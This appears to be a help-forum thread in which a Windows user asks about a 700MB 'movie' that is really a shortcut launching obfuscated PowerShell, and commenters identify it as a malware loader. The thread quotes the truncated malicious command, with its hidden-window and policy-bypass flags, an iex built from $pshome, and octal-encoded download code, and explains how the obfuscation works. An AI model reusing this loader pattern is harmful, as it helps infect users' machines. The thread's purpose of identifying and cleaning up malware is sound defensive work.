# What does specifically this link do or is it a virus?

Tags: windows-10, virus, shortcuts

In Windows 10 I downloaded this file that I thought was a movie but it was a short-cut with a size of 700MB

I see that the target is this

> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd
>   1 -eXEc ByP  . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141,
>   163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 ,
>   152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116

And it was set to start at

> %SYSTEMROOT%\System32\WindowsPowerShell\v1.0

What does it do?

Comment: -nopr, -wind & byp are all pretty scary...The numbers are forming a bit-shifted URL but I don't have the knowledge to work out what it's trying to get to.

Comment: thanks, I actually pressed the link, the Powershell briefly poped up thats all, so far

Comment: It is obviously some sort of malware. The digits are octal numbers which translate into `$aspx = ((New-Object System.N`, but it would need a lot more of these to be able to work out what it is intended to do. If it has installed a Trojan, such as a key logger, then you won't be aware of its presence. Disconnect from the internet, restart (not reboot) and run a full virus scan (including root-kit scan). Depending on its nature it could have infected other systems in your network.

Comment: I have McaFee liveSafe premium but it did not react

Comment: Some similar obfuscated code is documented [here](https://www.hybrid-analysis.com/sample/afe37a79b49e80d09ab51400c291cb9d50b73cc561bb409c1d7b9c7bc3b002d0/5b28c36b7ca3e11c94574be5).

Answer (score 8):

It's a malware loader.

It executes a powershell code beginning with `New-Object System.N...` (hidden in the numbers), which in full content is `New-Object System.Net.WebClient`,  that will further be used to download and execute the actual malware from the URL that is also hidden in the further numbers of the obfuscated code.

If you have already clicked the link, then you're likely already infected, unless the URL was already taken down.

You may try to paste your line to notepad and then delete everything before `( -JoiN( (`, copy the remaining part (beginning with `( -JoiN( (`...) and paste it to PowerShell window. It will disclose the obfuscated PowerShell code that would normally be executed by the preceding `$pshOmE[4]+$PShoMe[30]+'X')` = `iex` = [`Invoke-Expression`](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6).

Comment: thanks, I got this code: **441411631601704075405050116145167551171421521451431644012317116316414515556116**  
How can i make out something from this code?

Comment: There are probably additional parts of the code (such as the actual URL) hiding in the shortcut file that are appended to the command when the shortcut is run.

Comment: Please pass the complete code, incl. commas.

Comment: that is the code I got following your instructions, 441411631601704075405050116.....

Comment: You're missing something. Please paste whole shortcut code.